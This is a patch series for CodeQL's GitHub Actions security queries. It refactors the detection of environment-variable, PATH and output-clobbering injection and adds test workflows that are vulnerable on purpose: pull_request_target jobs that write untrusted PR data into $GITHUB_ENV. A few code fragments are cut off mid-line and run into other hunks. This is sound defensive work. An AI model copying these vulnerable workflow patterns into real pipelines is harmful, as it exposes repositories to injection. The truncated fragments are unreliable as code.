pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "envpath-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate the PATH environment variable. */ diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 65c6938f0a4..dd6b8342185 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -14,8 +14,12 @@ abstract class EnvVarInjectionSink extends DataFlow::Node { } * e.g. * run: | * cat test-results/.env >> $GITHUB_ENV + * * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV * echo "sha=$(> $GITHUB_ENV + * + * FOO=$(cat test-results/sha-number) + * echo "FOO=$FOO" >> $GITHUB_ENV */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { @@ -27,37 +31,34 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and ( - // e.g. - // cat test-results/.env >> $GITHUB_ENV - Bash::fileToGitHubEnv(run, _) - or - exists(string value | - run.getAWriteToGitHubEnv(_, value) and - ( - // e.g. - // echo "FOO=$(cat test-results/sha-number)" >> $GITHUB_ENV - Bash::outputsPartialFileContent(run, value) - or - // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string var_name, string var_value | - run.getAnAssignment(var_name, var_value) and - Bash::outputsPartialFileContent(run, var_value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 - ) - ) - ) + exists(string cmd | + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", _) and + Bash::outputsPartialFileContent(run, cmd) ) + or + Bash::fileToGitHubEnv(run, _) ) ) } } +/** + * Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_ENV + * e.g. + * run: | + * COMMIT_MESSAGE=$(git log --format=%s) + * echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + */ +class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { + EnvVarInjectionFromCommandSink() { + exists(CommandSource source | + this.asExpr() = source.getEnclosingRun().getScriptScalar() and + Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_ENV", + _) + ) + } +} + /** * Holds if a Run step declares an environment variable, uses it to declare env var. * e.g. @@ -69,9 +70,9 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToSpecialFile("GITHUB_ENV", var_name, run, _) and exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + run.getScriptScalar() = this.asExpr() and + Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_ENV", _) ) } } @@ -104,6 +105,28 @@ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() and + Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + ) + or + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "envvar-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */ diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 8541286f6e1..4f9eeef7579 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -10,7 +10,7 @@ import codeql.actions.dataflow.FlowSources abstract class OutputClobberingSink extends DataFlow::Node { } /** - * Holds if a Run step declares an environment variable with contents from a local file. + * Holds if a Run step declares a step output variable with contents from a local file. * e.g. * run: | * cat test-results/.vars >> $GITHUB_OUTPUT @@ -21,58 +21,43 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { OutputClobberingFromFileReadSink() { exists(Run run, Step step | ( - step instanceof UntrustedArtifactDownloadStep or + step instanceof UntrustedArtifactDownloadStep + or // This shoould be: // artifact instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - step.(Uses).getCallee() = "actions/checkout" or - step instanceof GitMutableRefCheckout or - step instanceof GitSHACheckout or - step instanceof GhMutableRefCheckout or + exists(Uses uses | + step = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) + ) + or + step instanceof GitMutableRefCheckout + or + step instanceof GitSHACheckout + or + step instanceof GhMutableRefCheckout + or step instanceof GhSHACheckout ) and - this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and + this.asExpr() = run.getScriptScalar() and ( - // e.g. - // cat test-results/.vars >> $GITHUB_OUTPUT - Bash::fileToGitHubOutput(run, _) - or - exists(string key, string value | - run.getAWriteToGitHubOutput(key, value) and - // there is a different output variable in the same script - // TODO: key2/value2 should be declared before key/value - exists(string key2 | - run.getAWriteToGitHubOutput(key2, _) and - not key2 = key - ) and - ( - Bash::outputsPartialFileContent(run, value) - or - // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_OUTPUT - exists(string var_name, string var_value | - run.getAnAssignment(var_name, var_value) and - Bash::outputsPartialFileContent(run, var_value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 - ) - ) - ) + exists(string cmd | + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", _) and + Bash::outputsPartialFileContent(run, cmd) ) + or + Bash::fileToGitHubOutput(run, _) ) ) } } /** - * Holds if a Run step declares an environment variable, uses it to declare env var. + * Holds if a Run step declares an environment variable, uses it in a step variable output. * e.g. * env: * BODY: ${{ github.event.comment.body }} @@ -81,15 +66,15 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { */ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { OutputClobberingFromEnvVarSink() { - exists(Run run, string var_name, string key | - envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and + exists(Run run, string var, string field | + Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and // there is a different output variable in the same script // TODO: key2/value2 should be declared before key/value - exists(string key2 | - run.getAWriteToGitHubOutput(key2, _) and - not key2 = key + exists(string field2 | + run.getAWriteToGitHubOutput(field2, _) and + not field2 = field ) and - exists(run.getInScopeEnvVarExpr(var_name)) and + exists(run.getInScopeEnvVarExpr(var)) and run.getScriptScalar() = this.asExpr() ) } @@ -113,10 +98,9 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { */ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { WorkflowCommandClobberingFromEnvVarSink() { - exists(Run run, string output_line, string clobbering_line, string var_name | - run.getScript().splitAt("\n") = output_line and - Bash::singleLineWorkflowCmd(output_line, "set-output", _, _) and - run.getScript().splitAt("\n") = clobbering_line and + exists(Run run, string clobbering_line, string var_name | + Bash::singleLineWorkflowCmd(run.getACommand(), "set-output", _, _) and + run.getACommand() = clobbering_line and clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() @@ -124,13 +108,36 @@ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { } } +/** + * - id: clob1 + * run: | + * # VULNERABLE + * PR="$(; @@ -93,6 +102,15 @@ private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { uses.getArgumentExpr("ref") = sink.asExpr() ) } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } module ActionsSHACheckoutFlow = TaintTracking::Global; @@ -139,7 +157,7 @@ predicate containsHeadSHA(string s) { "\\bgithub\\.event\\.merge_group\\.head_sha\\b", "\\bgithub\\.event\\.merge_group\\.head_commit\\.id\\b", // heuristics - "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bpr_head_sha\\b" + "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bmerge_sha\\b", "\\bpr_head_sha\\b" ], _, _) ) } @@ -156,7 +174,7 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.merge_group\\.head_ref\\b", // heuristics - "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", + "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bmerge_ref\\b", "\\bpr_head_ref\\b", // env vars "GITHUB_HEAD_REF", ], _, _) From 1e749ae6d5ddff29c0bd1bac751c75ab5bbdb2df Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:39 +0200 Subject: [PATCH 0577/1267] Add new poisonable step --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 1543e2d8d45..aa5148d7cf6 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -52,6 +52,7 @@ extensions: - ["rails\\s+assets:precompile"] - ["rubocop"] - ["sed\\s+-f"] + - ["sonar-scanner"] - ["stylelint"] - ["terraform"] - ["tflint"] From 99e92af0342654cd86e600f03207b8aa005e7d24 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:57 +0200 Subject: [PATCH 0578/1267] Update tests --- .../library-tests/poisonable_steps.expected | 2 + ql/test/library-tests/test.ql | 2 +- .../.github/workflows/calling_composite.yml | 0 .../.github/workflows/calling_workflow.yml | 0 .../.github/workflows/reusable_workflow.yml | 0 .../CompositeActionsSinks.expected | 0 .../CompositeActionsSinks.qlref | 0 .../CompositeActionsSources.expected | 0 .../CompositeActionsSources.qlref | 0 .../CompositeActionsSummaries.expected | 0 .../CompositeActionsSummaries.qlref | 0 .../ReusableWorkflowsSinks.expected | 0 .../ReusableWorkflowsSinks.qlref | 0 .../ReusableWorkflowsSources.expected | 0 .../ReusableWorkflowsSources.qlref | 0 .../ReusableWorkflowsSummaries.expected | 0 .../ReusableWorkflowsSummaries.qlref | 0 .../CWE-020 => Models}/action1/action.yml | 0 .../CWE-074/OutputClobberingHigh.expected | 16 +- .../CWE-077/.github/workflows/test13.yml | 23 +++ .../CWE-077/.github/workflows/test14.yml | 30 ++++ .../CWE-077/.github/workflows/test15.yml | 29 ++++ .../CWE-077/.github/workflows/test8.yml | 2 - .../CWE-077/EnvPathInjectionCritical.expected | 11 +- .../CWE-077/EnvPathInjectionMedium.expected | 11 +- .../CWE-077/EnvVarInjectionCritical.expected | 77 +++++---- .../CWE-077/EnvVarInjectionMedium.expected | 65 ++++---- .../.github/workflows/arg_injection.yml | 12 +- .../ArgumentInjectionCritical.expected | 49 +++--- .../CWE-088/ArgumentInjectionMedium.expected | 31 ++-- .../CWE-094/.github/workflows/test.yml | 15 +- .../CWE-094/.github/workflows/test1.yml | 4 +- .../CWE-094/.github/workflows/test14.yml | 51 ++++++ .../CWE-094/.github/workflows/test15.yml | 38 +++++ .../CWE-094/CodeInjectionCritical.expected | 146 +++++++++++------- .../CWE-094/CodeInjectionMedium.expected | 134 ++++++++++------ .../ArtifactPoisoningCritical.expected | 38 ++--- .../CWE-829/ArtifactPoisoningMedium.expected | 38 ++--- 38 files changed, 544 insertions(+), 280 deletions(-) rename ql/test/query-tests/{Security/CWE-020 => Models}/.github/workflows/calling_composite.yml (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/.github/workflows/calling_workflow.yml (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/.github/workflows/reusable_workflow.yml (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSinks.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSinks.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSources.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSources.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSummaries.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSummaries.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSinks.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSinks.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSources.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSources.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSummaries.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSummaries.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/action1/action.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index a87ec0a341c..100eddb1400 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,3 +1,5 @@ +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 5880e06da7f..03f9e5b1840 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -150,6 +150,6 @@ query predicate isBashParameterExpansion(string parameter, string operator, stri "${parameter21%%pattern}", "${parameter22/pattern/string}", "${parameter23//pattern/string}", ] and - Bash::isBashParameterExpansion(test, parameter, operator, params) + Bash::isParameterExpansion(test, parameter, operator, params) ) } diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml b/ql/test/query-tests/Models/.github/workflows/calling_composite.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml rename to ql/test/query-tests/Models/.github/workflows/calling_composite.yml diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml b/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml rename to ql/test/query-tests/Models/.github/workflows/calling_workflow.yml diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml b/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml rename to ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Models/CompositeActionsSinks.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected rename to ql/test/query-tests/Models/CompositeActionsSinks.expected diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref b/ql/test/query-tests/Models/CompositeActionsSinks.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref rename to ql/test/query-tests/Models/CompositeActionsSinks.qlref diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Models/CompositeActionsSources.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected rename to ql/test/query-tests/Models/CompositeActionsSources.expected diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref b/ql/test/query-tests/Models/CompositeActionsSources.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref rename to ql/test/query-tests/Models/CompositeActionsSources.qlref diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Models/CompositeActionsSummaries.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected rename to ql/test/query-tests/Models/CompositeActionsSummaries.expected diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref b/ql/test/query-tests/Models/CompositeActionsSummaries.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.qlref rename to ql/test/query-tests/Models/CompositeActionsSummaries.qlref diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected rename to ql/test/query-tests/Models/ReusableWorkflowsSinks.expected diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.qlref rename to ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Models/ReusableWorkflowsSources.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected rename to ql/test/query-tests/Models/ReusableWorkflowsSources.expected diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.qlref rename to ql/test/query-tests/Models/ReusableWorkflowsSources.qlref diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected rename to ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref b/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref rename to ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref diff --git a/ql/test/query-tests/Security/CWE-020/action1/action.yml b/ql/test/query-tests/Models/action1/action.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/action1/action.yml rename to ql/test/query-tests/Models/action1/action.yml diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected index b6cb2a32e47..715e2c4c90c 100644 --- a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected @@ -1,12 +1,12 @@ edges -| .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | | -| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | | -| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | | -| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | | -| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | Config | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | Config | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml new file mode 100644 index 00000000000..78d288fb982 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml @@ -0,0 +1,23 @@ +name: publish +on: + pull_request_target: + branches: + - main +jobs: + need-publish: + permissions: + actions: write + name: Need Publish + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Get commit message + run: | + COMMIT_MESSAGE=$(git log --format=%s) + echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + - name: Get commit message + run: | + echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml new file mode 100644 index 00000000000..93854c5e889 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml @@ -0,0 +1,30 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + test2: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: changed-files + run: | + FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/) + echo "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV" + - run: echo "${{ env.CHANGED-FILES }}" + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml new file mode 100644 index 00000000000..89ecd8c0ec3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml @@ -0,0 +1,29 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV" + - run: echo "$TITLE" + test2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH}) + echo "BODY=$PR_BODY" >> "$GITHUB_ENV" + - run: echo "$TITLE" + test3: + runs-on: ubuntu-latest + steps: + - run: | + echo "branch_name=$(jq --raw-output .pull_request.head.ref $GITHUB_EVENT_PATH)" >> $GITHUB_ENV + + + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml index 05bde57551d..806f8dc8e45 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -20,8 +20,6 @@ jobs: contents: write steps: - uses: actions/checkout@v4 - with: - ref: foo - name: Download and Extract Artifacts uses: dawidd6/action-download-artifact@v6 diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index 7fab238795c..851aa524154 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -1,10 +1,9 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | Config | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index ea360bc56df..5be9f729ad6 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -1,10 +1,9 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | -| .github/workflows/path1.yml:21:9:25:6 | 